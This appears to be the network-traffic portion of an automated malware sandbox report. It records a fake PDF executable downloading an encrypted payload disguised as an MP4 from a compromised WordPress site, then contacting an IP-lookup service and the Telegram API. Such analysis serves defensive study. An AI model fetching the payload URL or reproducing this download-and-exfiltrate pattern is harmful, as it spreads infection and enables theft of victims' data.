Nov 28, 2024 18:39:41.034806967 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.034821987 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.034871101 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.197577000 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.197601080 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.197664022 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.197690010 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.197740078 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.197740078 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.203908920 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.203928947 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.203978062 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.203988075 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.204044104 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.209041119 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.209058046 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.209111929 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.209126949 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.209167957 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.216669083 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.216686964 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.216727972 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.216739893 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.216778040 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.221997976 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.222014904 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.222150087 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.222158909 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.222198963 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.228094101 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.228111029 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.228163958 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.228173971 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.228204966 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.234617949 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.234636068 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.234689951 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.234707117 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.234747887 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.240320921 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.240343094 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.240410089 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.240417957 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.240493059 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.420715094 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.420743942 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.420881033 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.420902014 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.420950890 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.427093983 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.427113056 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.427377939 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.427387953 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.427429914 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.433641911 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.433660030 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.434072018 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.434082985 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.434118986 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.439378977 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.439394951 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.439469099 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.439477921 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.439512014 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.445822954 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.445849895 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.445904016 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.445913076 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.445956945 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.452061892 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.452084064 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.452155113 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.452167988 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.452210903 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.458497047 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.458514929 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.458585978 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.458597898 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.458633900 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.465017080 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.465034008 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.465100050 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.465111971 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.465148926 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.480962038 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.632277012 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.632309914 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.632373095 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.632394075 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.632453918 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.632476091 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.638089895 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.638111115 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.638187885 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.638199091 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.638240099 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.643769979 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.643788099 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.643876076 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.643887043 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.643929005 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.651438951 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.651458025 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.651516914 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.651526928 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.651570082 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.651596069 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.658143044 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.658162117 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.658226967 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.658237934 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.658283949 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.664083958 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.664103985 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.664160013 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.664180040 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.664222956 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.670608997 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.670638084 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.670692921 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.670692921 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.670703888 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.670737982 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.676673889 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.676702023 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.676754951 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.676763058 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.676809072 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.676809072 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.841254950 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.841316938 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.841345072 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.841360092 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.841399908 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.841399908 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.841401100 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.841470003 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.990288973 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:40:28.263830900 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:28.263876915 CET	443	49749	104.26.13.205	192.168.2.6
Nov 28, 2024 18:40:28.263957977 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:28.268424034 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:28.268438101 CET	443	49749	104.26.13.205	192.168.2.6
Nov 28, 2024 18:40:29.531531096 CET	443	49749	104.26.13.205	192.168.2.6
Nov 28, 2024 18:40:29.531621933 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:29.535366058 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:29.535382986 CET	443	49749	104.26.13.205	192.168.2.6
Nov 28, 2024 18:40:29.535861015 CET	443	49749	104.26.13.205	192.168.2.6
Nov 28, 2024 18:40:29.583024979 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:29.612399101 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:29.659332037 CET	443	49749	104.26.13.205	192.168.2.6
Nov 28, 2024 18:40:29.986192942 CET	443	49749	104.26.13.205	192.168.2.6
Nov 28, 2024 18:40:29.986264944 CET	443	49749	104.26.13.205	192.168.2.6
Nov 28, 2024 18:40:29.986848116 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:29.990077019 CET	49749	443	192.168.2.6	104.26.13.205
Nov 28, 2024 18:40:30.701584101 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:30.701632023 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:30.701792955 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:30.702284098 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:30.702300072 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.170160055 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.170254946 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:32.172720909 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:32.172736883 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.172992945 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.174154043 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:32.215326071 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.522782087 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:32.522799969 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.827538967 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.879970074 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:32.985594988 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.985667944 CET	443	49750	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:32.985743999 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:32.986352921 CET	49750	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:33.060702085 CET	49752	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:33.060751915 CET	443	49752	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:33.060843945 CET	49752	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:33.061316013 CET	49752	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:33.061330080 CET	443	49752	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:34.548085928 CET	443	49752	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:34.549573898 CET	49752	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:34.549596071 CET	443	49752	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:34.895754099 CET	49752	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:34.895782948 CET	443	49752	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:35.219410896 CET	443	49752	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:35.270584106 CET	49752	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:35.373959064 CET	443	49752	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:35.374061108 CET	443	49752	149.154.167.220	192.168.2.6
Nov 28, 2024 18:40:35.374177933 CET	49752	443	192.168.2.6	149.154.167.220
Nov 28, 2024 18:40:35.374644995 CET	49752	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2024 18:39:37.209584951 CET	54587	53	192.168.2.6	1.1.1.1
Nov 28, 2024 18:39:37.522304058 CET	53	54587	1.1.1.1	192.168.2.6
Nov 28, 2024 18:40:28.120237112 CET	53636	53	192.168.2.6	1.1.1.1
Nov 28, 2024 18:40:28.257561922 CET	53	53636	1.1.1.1	192.168.2.6
Nov 28, 2024 18:40:30.558523893 CET	55129	53	192.168.2.6	1.1.1.1
Nov 28, 2024 18:40:30.700843096 CET	53	55129	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 28, 2024 18:39:37.209584951 CET	192.168.2.6	1.1.1.1	0x8801	Standard query (0)	www.inspiranti.com	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:40:28.120237112 CET	192.168.2.6	1.1.1.1	0x4f4d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:40:30.558523893 CET	192.168.2.6	1.1.1.1	0xef14	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 28, 2024 18:39:37.522304058 CET	1.1.1.1	192.168.2.6	0x8801	No error (0)	www.inspiranti.com	172.67.135.55	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:39:37.522304058 CET	1.1.1.1	192.168.2.6	0x8801	No error (0)	www.inspiranti.com	104.21.6.194	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:40:28.257561922 CET	1.1.1.1	192.168.2.6	0x4f4d	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:40:28.257561922 CET	1.1.1.1	192.168.2.6	0x4f4d	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:40:28.257561922 CET	1.1.1.1	192.168.2.6	0x4f4d	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:40:30.700843096 CET	1.1.1.1	192.168.2.6	0xef14	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.inspiranti.com

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	172.67.135.55	443	6916	C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-28 17:39:39 UTC	94	OUT	GET /wp-includes/Nuymzsracm.mp4 HTTP/1.1 Host: www.inspiranti.com Connection: Keep-Alive
2024-11-28 17:39:39 UTC	934	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 17:39:39 GMT Content-Type: video/mp4 Content-Length: 1142280 Connection: close Last-Modified: Wed, 28 Aug 2024 07:10:15 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 915 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86uOYy0Ne931jsFdvbyqmdJ2FRFUWp9jDaJCcIq4IAyOdm0Chcb%2FnGqG2TVloOxUO1H3cp59x7KYJo2xDz0EhGaJ8KlAvQQdDP1iOcdr6PJthETUV8qKGP5%2BwDNx2OtaoWAK%2FwA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; includeSubDomains Server: cloudflare CF-RAY: 8e9c237ab8a01a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1807&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=708&delivery_rate=1553191&cwnd=155&unsent_bytes=0&cid=728d1916cc741dfa&ts=640&x=0"
2024-11-28 17:39:39 UTC	435	IN	Data Raw: b0 07 79 5d 7a f5 d9 21 f0 a7 76 09 11 bc 42 a6 07 e1 4d d9 a3 3b e5 47 1b f6 a6 c7 ab 2d 8f 85 fe 12 d7 66 a8 45 b3 49 83 ab 9f 57 c9 4e 8b 06 09 fa 2f 71 e4 18 aa 53 41 fb 47 2e e9 9e 03 4d 05 4c f6 86 49 c0 47 39 9b 90 43 d7 b9 88 17 c2 ce f4 23 ed b5 5a 67 85 9e da 38 84 51 66 75 69 e9 b6 ef fb cb 80 9f e5 8c 63 30 35 0c 65 b6 2e 52 d6 77 30 2c 91 af c1 94 6d 1e 61 e5 19 5d 02 c5 37 4d 9e a4 e1 81 40 12 6d dd 0c 43 6e 56 c4 18 34 42 37 48 df 68 04 cc d2 36 2b 82 f2 c4 2e 9f e1 a2 c9 38 42 aa c4 d2 f5 f5 f9 e2 d2 b2 b5 17 59 85 06 ea a9 88 bd f8 e9 b0 d0 b2 5f c8 3a e0 ad 4a 3c b1 58 67 24 b6 02 4e be a3 08 c5 0b 07 12 62 4c d9 11 a1 8f 9b 40 ac ff c9 7f a7 23 3a f6 f3 c4 ac 77 03 e9 ea 49 ad a3 56 2e 3b 81 e4 f1 88 91 1d 71 61 df 5d 1e ba 7f a4 40 7b Data Ascii: y]z!vBM;G-fEIWN/qSAG.MLIG9C#Zg8Qfuic05e.Rw0,ma]7M@mCnV4B7Hh6+.8BY_:J<Xg$NbL@#:wIV.;qa]@{
2024-11-28 17:39:39 UTC	1369	IN	Data Raw: 52 5a 5c 82 7c ec 1d 2c ec f5 26 8d d8 9c 06 09 46 06 af 27 f0 79 1e 7a 7b d5 71 3b 50 d9 78 4c dc 41 8e e1 6d 26 26 0a a9 37 63 e0 5e e4 d0 f9 0d 0b 1a f3 9d 6d 14 a5 68 77 40 6c af 60 c3 87 aa 01 4e 54 4d fb 21 02 eb 8c 9f 69 e1 a0 ae 76 05 9a a0 5a d4 88 70 06 64 53 40 cb 49 49 c6 e6 07 ef 8d bd 00 c9 6a 16 e8 c1 b5 59 f8 71 ee d3 c3 76 c3 73 28 4b e3 17 55 4c b0 9b 2d 01 1e 9d 9a db e3 d9 53 75 d2 3e 36 2f 14 bd 3e 9c ba 2c 6b da 8d 0e 32 0a 03 d3 de 8d 1c a4 bf 5e c0 e2 13 05 37 f3 76 3a 5d 61 2b 10 c4 d0 9f 32 90 d4 92 31 c7 20 f0 1c 78 a1 79 18 6d a2 ad 54 a3 d4 af 62 7e 28 26 bb 1b 5c ea fa 2e ad 09 c1 06 31 b6 89 57 b3 45 e9 f3 3c 0e 7e 87 ea 6b a5 19 93 e6 07 5d fd af 88 82 68 5a b1 87 1d 79 87 4f 25 a0 80 a3 49 f6 b4 c7 2b 25 46 69 e2 16 88 e6 Data Ascii: RZ\\|,&F'yz{q;PxLAm&&7c^mhw@l`NTM!ivZpdS@IIjYqvs(KUL-Su>6/>,k2^7v:]a+21 xymTb~(&\.1WE<~k]hZyO%I+%Fi
2024-11-28 17:39:39 UTC	1369	IN	Data Raw: f2 75 ee 77 ee 30 f8 13 5a 5a 61 fa fb 33 0c f1 de c3 18 8b 3c 4f 65 88 12 45 67 9b c1 99 4a c4 be 4b d6 b4 f1 4c c6 e6 c3 62 7e 49 c0 38 da ea 08 46 53 33 e4 c0 76 f1 5e ae 2e 0f 6d 21 ad 55 17 8b 39 90 8c a2 c0 17 ee 18 f9 50 85 1f 0b 71 31 ec fb fd 20 14 e4 fb 89 9d f8 7d 2e 6f 31 d9 51 7c 2d 61 a4 7d 8a 99 36 2e fb 94 b0 04 43 9a 8c 59 5d 38 e6 a3 75 97 0c 2f 81 10 10 9f ba 1e 08 c6 44 62 9d 51 60 ff 57 3b a0 56 a0 20 14 4e 8d 03 02 03 15 6d e1 3b 32 5a a3 0a 16 63 11 a3 ed 64 ac 00 bf 00 e7 20 24 20 20 e5 10 c9 ff 2c 3d b6 c6 83 38 28 c5 3e 2d ac 3c 5f 0e bf 6e 42 b0 a0 48 9f a5 c0 73 47 aa 7b ce f7 1e e7 54 0f bf 27 63 10 b5 0d a4 96 67 b7 4d 90 e2 57 0d 17 c9 93 85 06 5f db 22 1c 8d 40 57 2c a9 f0 13 5f 01 36 c7 49 2c 25 cf b8 94 71 3a 6d 19 a9 1e Data Ascii: uw0ZZa3<OeEgJKLb~I8FS3v^.m!U9Pq1 }.o1Q\|-a}6.CY]8u/DbQ`W;V Nm;2Zcd $ ,=8(>-<_nBHsG{T'cgMW_"@W,_6I,%q:m
2024-11-28 17:39:39 UTC	1369	IN	Data Raw: fd 33 24 b9 6e 16 c3 04 31 ae 23 ef 98 92 9b 5f 43 d7 85 48 85 e1 f8 35 66 d7 d9 b9 73 64 c0 89 e8 24 21 1f e2 04 6b ab 35 2b e4 55 ff b9 ad d5 cc 57 d2 c4 02 1a b1 0f 9d 30 c5 f2 c0 7e 1c a3 be 59 47 ff 46 7b bb 2d 18 66 b7 22 70 4b 7d 19 bd be 37 c7 02 c0 bf 4a 3b 08 56 24 49 48 27 cc a5 11 23 75 3e d9 98 94 51 3f fb 0c 47 91 e7 2d 74 36 07 44 af 97 05 b5 52 46 db 7a 3b f9 8d f5 b2 ea 06 a2 e4 bc 47 ab 5e e5 49 42 28 16 7b 94 ed 68 a3 83 2a 69 e0 d8 96 5e 9c 2e 36 07 49 a0 06 6e ad 36 1f 3f e5 0a 00 89 ec 23 b6 31 af 4a 56 1c 1f f6 ad 13 14 7a 8a a5 83 5c 89 f8 31 46 0f ff 34 c1 29 be a0 e3 c2 cc 7b 88 50 74 4e 16 92 70 1d b3 d5 a1 c1 a1 e9 eb 1b 5d a4 bb f7 3a ce d3 32 f1 bc b5 fc dc fd 37 73 75 9e a1 bb 93 49 14 88 32 d5 0f f3 70 86 24 04 d3 29 69 a0 Data Ascii: 3$n1#_CH5fsd$!k5+UW0~YGF{-f"pK}7J;V$IH'#u>Q?G-t6DRFz;G^IB({h*i^.6In6?#1JVz\1F4){PtNp]:27suI2p$)i
2024-11-28 17:39:39 UTC	1369	IN	Data Raw: 87 72 c9 42 b2 88 fa c2 79 f1 f8 db 70 1c 89 2d 4d 5a 57 79 d0 41 15 8c c9 86 75 1e bf 87 47 33 97 10 df f4 3f 66 70 84 72 f3 cd 1c 65 4b 30 8b dc 85 94 75 c3 e9 af cf 7b dd b9 99 90 62 23 d8 7b de 07 f9 78 cf 11 8a 57 44 0e 64 87 e8 5f 73 7d df 88 97 d8 a3 f7 5c c4 3d 72 d7 a0 2f 74 77 31 73 85 c3 fc 0b 7a 18 4a e4 34 d7 e5 31 14 ac 80 d8 db 11 c5 7e 2c fc fa 39 cd dc 31 9e eb 01 6b e8 a2 73 03 19 9f db ab 5d a1 a8 b5 6d d7 7d b7 13 45 a5 20 2f a3 d7 0d 90 b0 ee 3d ae 16 80 11 6a 6e df 08 de 26 41 27 f9 fa cf 15 b5 7c db 5e 93 56 a2 ec 84 b8 25 12 c1 50 d4 4d 02 46 29 fe 15 80 5b 92 3c 6a 11 9f 74 c2 90 f8 2b ea d8 c2 7a fa c3 af 26 26 95 18 c0 97 ac 74 18 b2 79 e2 42 78 7f 5d bd 7c 5f 61 13 9e cc 9e 68 59 06 e9 9f b6 99 61 15 a5 4d 69 74 01 a9 2b ab 12 Data Ascii: rByp-MZWyAuG3?fpreK0u{b#{xWDd_s}\=r/tw1szJ41~,91ks]m}E /=jn&A'\|^V%PMF)[<jt+z&&tyBx]\|_ahYaMit+
2024-11-28 17:39:39 UTC	1369	IN	Data Raw: 18 5c 74 56 34 d7 ee a7 29 97 cc a0 9e 37 b8 48 f8 13 13 d0 37 31 07 dd 10 5d 2c cf 87 fe 79 16 b6 78 66 b8 3d 81 4b bb 05 51 3b 47 8d 70 6e d1 4a c5 68 76 3e 73 c1 11 d4 57 0c dc 96 a7 d2 7b ea fd 62 51 c7 7b e6 57 62 81 48 2b 0a 45 7b 18 cf f5 72 f3 13 c1 dc de d4 f8 7e 7a 41 a4 54 db 94 5b c8 9d 6f b2 ff 10 03 84 bf 29 19 49 8f af 64 93 5c db 95 14 f7 d0 24 63 58 46 54 5b d5 93 1e 83 01 9d 6b 6a 50 99 17 95 1c 07 ac 67 c7 25 31 07 51 2a ef 90 05 1e 15 f1 bf d6 6d a6 f2 ce 4e d2 ff 8c 2e 86 b4 a1 10 ad dd 01 fa 92 25 45 08 f1 28 44 b1 a9 da 34 2e c4 da 71 f7 be 88 53 c4 a5 bf bc 93 14 1b ea 04 e3 b1 df 30 09 8f 95 1b 91 46 54 89 12 03 7b 73 ab 7e fc 69 63 2d da 86 57 68 72 4a e5 55 5d 44 38 1d 97 fd 2b 6a 8c 20 dd 05 31 d8 2a 65 f8 6b a4 73 25 45 ea 75 Data Ascii: \tV4)7H71],yxf=KQ;GpnJhv>sW{bQ{WbH+E{r~zAT[o)Id\$cXFT[kjPg%1QmN.%E(D4.qS0FT{s~ic-WhrJU]D8+j 1eks%Eu
